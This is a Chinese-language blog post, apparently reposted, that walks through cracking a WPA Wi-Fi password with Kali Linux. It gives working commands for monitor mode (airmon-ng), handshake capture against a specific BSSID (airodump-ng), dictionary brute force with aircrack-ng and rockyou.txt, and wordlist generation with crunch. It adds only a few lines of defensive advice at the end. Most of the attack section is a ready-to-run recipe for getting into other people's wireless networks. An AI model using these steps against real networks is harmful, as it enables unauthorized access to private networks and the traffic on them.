破解wifi(物理黑客)


題記

       大家好啊,我也知道我寫一堆東西也沒啥人看,這只是自娛自樂,但也是鞭策我的一種方式,也是讓我回顧的便捷途徑。這些天一直看大佬講的挖src實戰經驗,也沒時間記筆記。好幾個實戰我都想實操,奈何工具還沒到我手,小米wifi剛到,下一個就是badusb了,在下個就是vps了,我已經迫不及待的准備把我的靶場與想法實現了。真想體驗體驗一鍵上線cs的感覺的。物理黑客也是黑客(哼)。不斷學習,我將會是中國最偉大的黑客(中二臉)。是真的,我越來越認為網安是我們越來越重視的東西,這東西我們落下美國太多年了,加強網安建設自我輩開始。

一、准備工作

1、usb無線網卡,我買的小米隨身wifi,即插即用,不用安裝驅動。

2、vm服務全部開啟。

3、kali設為橋接模式,橋接模式依賴的是網卡。

二、操作步驟

1、開啟虛擬機,把kali上線。

2、插入酷似usb的隨身wifi。

3、ifconfig看一下網卡接口,名字一般是wlan0.

4、開啟無線網卡監聽模式

airmon-ng start wlan0,之后在查看網卡接口,發現名字變了。

5、查看周圍網絡

airodump-ng wlan0mon

中間這個是目標wifi,抓到wifi就Ctrl+c停止。這時候需要注意的是此wifi的信道為3,所以我們要把網卡監聽信道調成3,airodump-ng wlan0mon -c 3。

6、創建一個目錄,用來存放抓到的握手包文件。

mkdir pojie

7、開始抓包

airodump-ng -c 3 --bssid B8:3A:08:C5:88:71 -w pojie/ wlan0mon 注意:信道不能錯,文件抓到包后會存在pojie目錄下,生成一個-01.cap文件。

8、另開一個窗口進行攻擊,使鏈接wifi的設備重連wifi,我們抓取中間包。

9、回到之前窗口我們可以看到成功抓到包了。

10、結束掉抓包后開始暴力破解。

aircrack-ng -a2 -b B8:3A:08:C5:88:71 -w /usr/share/wordlists/rockyou.txt pojie/-01.cap

注意:初次使用字典需要解壓。

gzip -d /usr/share/wordlists/rockyou.txt.gz

或者自己傳一個字典去干爆密碼。

11、破解成功圖如下(密碼被打馬賽克,其實不重要,總不能來我家蹭網吧)。

12、關閉網卡監聽模式,然后就能上網了。

airmon-ng stop wlan0mon

三、爆破字典

1、在kali里,是默認自帶了字典的,分別放在下面三個文件中:

/usr/share/wordlist

/usr/share/wfuzz/wordlist

/usr/share/seclists,有一個password

2、生成一個指定文件名的密碼文件,密碼長度為1到8位

crunch 1 8 123456 -o  mimam/mima.txt

3、自己網上搜集搜集,好字典才是王道。

四、注意事項

1、防止這種攻擊最簡單的方法是設置賊復雜賊長的密碼;

2、不要使用WEP加密方式,非常容易被破解;

3、監聽信道和wifi信道一定要保持一致。

參考鏈接:https://mp.weixin.qq.com/s/VuQ0eIm1zTuP5bzYGvFmBQ


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM